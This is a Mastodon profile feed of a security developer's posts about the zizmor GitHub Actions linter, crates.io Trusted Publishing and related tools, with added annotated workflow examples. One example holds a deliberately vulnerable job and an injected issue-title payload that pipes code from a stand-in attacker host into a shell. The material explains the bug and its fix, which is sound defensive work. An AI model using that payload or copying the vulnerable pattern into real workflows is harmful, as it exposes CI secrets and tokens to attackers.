yossarian (1.3.6.1.4.1.55738)

@yossarian@infosec.exchange
1.4K Followers
134 Following
1.1K Posts

open source interloper; attracts bugs easily

a bit of Yiddish posting

website: https://yossarian.net
blog: https://blog.yossarian.net
github: https://github.com/woodruffw
bluesky: https://bsky.app/profile/yossarian.net
very pleased to see that zizmor's mystery 1.5.2 user is finally starting(?) to migrate off of it
TIL: Python 3.15's new buffer size

Just released gha-update 0.2.0! https://github.com/davidism/gha-update/releases/tag/0.2.0 Use this tool to pin and update GitHub actions locally rather than with Dependabot. I wrote about why I made this tool here: https://davidism.com/disabling-scheduled-dependency-updates/
Release 0.2.0 · davidism/gha-update

This is the gha-update 0.2.0 feature release. PyPI: https://pypi.org/project/gha-update/0.2.0/ Changes: https://gha-update.readthedocs.io/page/changes/#version-0-2-0 Follow redirects for moved pro...

GitHub
TIL: Overriding pytest fixtures

🦀 ICYMI: "Trusted Publishing" on crates.io is now officially shipped! 🎉

https://blog.rust-lang.org/2025/07/11/crates-io-development-update-2025-07/

tl;dr you can now publish via GitHub Actions without setting up a secret API token

#rustlang

crates.io: development update | Rust Blog

Empowering everyone to build reliable and efficient software.
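What the boosted post describes, as an added example (not from the Rust blog post or the crates.io project): a release workflow that publishes to crates.io via Trusted Publishing, so no long-lived API token is stored as a repository secret. It assumes the crate's trusted publisher has already been configured on crates.io for this repository and this workflow file name (`release.yml`), and that the `rust-lang/crates-io-auth-action` action and its `token` output match the crates.io documentation at the time of writing; check both against the current docs before relying on this.

```yaml
# Added example, not the project's own code. Assumptions: the crate on
# crates.io lists this repository + workflow file as a trusted publisher,
# and the auth action name/output below match the current crates.io docs.
name: release

on:
  push:
    tags: ["v*"]

# Deny everything by default; the publish job opts in to exactly what it needs.
permissions: {}

jobs:
  publish:
    runs-on: ubuntu-latest
    permissions:
      id-token: write   # needed to mint the OIDC token crates.io exchanges
      contents: read    # checkout only; no push rights
    steps:
      # Pin these to commit SHAs in a real repository (see the zizmor and
      # gha-update posts on this page); tags are used here for readability.
      - uses: actions/checkout@v4
        with:
          persist-credentials: false   # don't leave GITHUB_TOKEN in .git/config

      - uses: dtolnay/rust-toolchain@stable

      # Exchange the job's OIDC identity for a short-lived crates.io token.
      # crates.io verifies the token's repository/workflow claims against the
      # trusted publisher configured for the crate.
      - id: auth
        uses: rust-lang/crates-io-auth-action@v1

      # The token lives only for this job; nothing to rotate or leak later.
      - run: cargo publish
        env:
          CARGO_REGISTRY_TOKEN: ${{ steps.auth.outputs.token }}
```

The security-relevant difference from the old flow is scope and lifetime: the credential is minted per run for this repository and workflow, so a leaked CI log or a compromised fork cannot reuse it, and there is no `CARGO_REGISTRY_TOKEN` secret for a malicious dependency or action to exfiltrate.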

fastapi is so good

zizmor v1.11.0 is released!

this is a much smaller release than v1.10.0, but it comes with an experimental feature that's been in the works for a long time: LSP support!

with `zizmor --lsp` you can now integrate zizmor directly into your editor/IDE. we even have an (experimental) vscode extension already: https://marketplace.visualstudio.com/items?itemName=zizmor.zizmor-vscode

see the full notes here: https://docs.zizmor.sh/release-notes/

#rust #security #opensource #github

great post from the folks over at grafana about how they’re using zizmor at scale across their whole estate: https://grafana.com/blog/2025/06/26/how-to-detect-vulnerable-github-actions-at-scale-with-zizmor/
How to detect vulnerable GitHub Actions at scale with Zizmor | Grafana Labs

In order to harden our infrastructure and pipelines, we have introduced the open source tool Zizmor into our CI/CD pipelines.

Grafana Labs
what’s the matter babe? you haven’t touched your 50 pounds of raisinettes

zizmor v1.10.0 is released!

this is a *huge* new release in terms of features, bugfixes, and enhancements. just to highlight a few:

* zizmor's new experimental fix mode is now available! users can use `--fix=[MODE]` to control it; see the docs for more: https://docs.zizmor.sh/usage/#auto-fixing-results

* the new anonymous-definition audit flags unnamed workflows and jobs for the pedantic persona: https://docs.zizmor.sh/audits/#anonymous-definition

* zizmor's location/fixture core has been rewritten to support "subfeatures," meaning that many audits now produce much nicer/more precise finding renders that are easier to read

read the full release notes here: https://docs.zizmor.sh/release-notes/#1100

#rust #security

Usage - zizmor

Usage tips and recipes for running zizmor locally and in CI/CD.
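An added example (constructed here, not zizmor's own code or docs) of the class of bug the release above is built to find and fix: a workflow that expands attacker-controlled event data directly into a shell script, beside the hardened form. The job names and the `triage` workflow are hypothetical; the audit this corresponds to is zizmor's `template-injection` audit, and the fix shown is the one its fix mode is meant to apply.

```yaml
# Added example, not from the zizmor project. Both jobs are constructed
# for illustration; only one of them would survive a zizmor run.
name: triage

on:
  issues:
    types: [opened]

permissions:
  contents: read

jobs:
  # BEFORE: `${{ ... }}` is expanded by the Actions templater into the
  # script *text* before the shell ever runs. An issue title chosen by
  # any GitHub user, e.g.
  #   hi"; curl https://attacker.example/x | sh; echo "
  # therefore becomes shell code running with this job's token and secrets.
  vulnerable:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "New issue: ${{ github.event.issue.title }}"

  # AFTER: route the value through an environment variable. The templater
  # expands it into the process environment, not into the script, and the
  # shell reads it as data. Double quotes prevent word splitting and globbing.
  hardened:
    runs-on: ubuntu-latest
    steps:
      - env:
          ISSUE_TITLE: ${{ github.event.issue.title }}
        run: |
          echo "New issue: $ISSUE_TITLE"
```

Running `zizmor` on a workflow containing the `vulnerable` job reports the `run:` block; the `hardened` job is the shape the rewrite should take whether applied by hand or via `--fix=[MODE]` as described in the release notes linked above. The same env-indirection works for any `github.event.*` field a stranger can influence (PR titles, branch names, commit messages, review bodies), not only issue titles.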


sneak peek for more precise subspanning within zizmor:

(this overcomes one of zizmor's earliest architectural limitations, i.e. that it could only span on full YAML elements and nothing within those elements. no longer!)

compare to the old render, which knew which part of the code block was problematic but couldn't span it discretely: